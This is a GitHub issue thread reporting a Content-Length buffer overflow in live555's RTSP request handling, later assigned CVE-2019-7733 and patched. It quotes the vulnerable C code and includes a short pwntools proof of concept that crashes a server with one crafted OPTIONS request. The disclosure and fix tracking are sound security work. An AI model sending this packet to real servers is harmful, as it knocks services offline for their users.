search

rgaufman / live555

A mirror of the live555 source code.
GNU Lesser General Public License v3.0
759 stars 368 forks source link

There is a buffer overflow which can lead to dos in live555 v0.95 #21

Open zounathan opened 5 years ago

zounathan commented 5 years ago

When parse the request packet in function handleRequestBytes, the code don't check the content-length, and use it in memmove. Finally cause the buff overflow.

    unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
    numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
    resetRequestBuffer(); // to prepare for any subsequent request

    if (numBytesRemaining > 0) {
      memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
      newBytesRead = numBytesRemaining;
    }

There is a content-length check, but it only assigns parseSucceeded to false. This can't avoid the memmove.

Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
                            cmdName, sizeof cmdName,
                            urlPreSuffix, sizeof urlPreSuffix,
                            urlSuffix, sizeof urlSuffix,
                            cseq, sizeof cseq,
                            sessionIdStr, sizeof sessionIdStr,
                            contentLength);
    fLastCRLF[2] = '\r'; // restore its value
    // Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
    if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
#ifdef DEBUG
      fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
#endif
      parseSucceeded = False;
    }

I can make the server crash with a simple packet.

from pwn import *
p1 = remote("IP", Port)

pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
pl += "Content-Length: 4294927296\r\n\r\n"
p1.send(pl)
nluedtke commented 5 years ago

This was assigned CVE-2019-7733.

hlef commented 5 years ago

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

NicoleG25 commented 4 years ago

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ? Thanks :)

hlef commented 4 years ago

This was addressed in 2019.05.12, please close. http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ? Thanks :)

@NicoleG25 As far as I recall: ef01f0a7db9d7a7660658d088e36c4c4d0d02e27, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.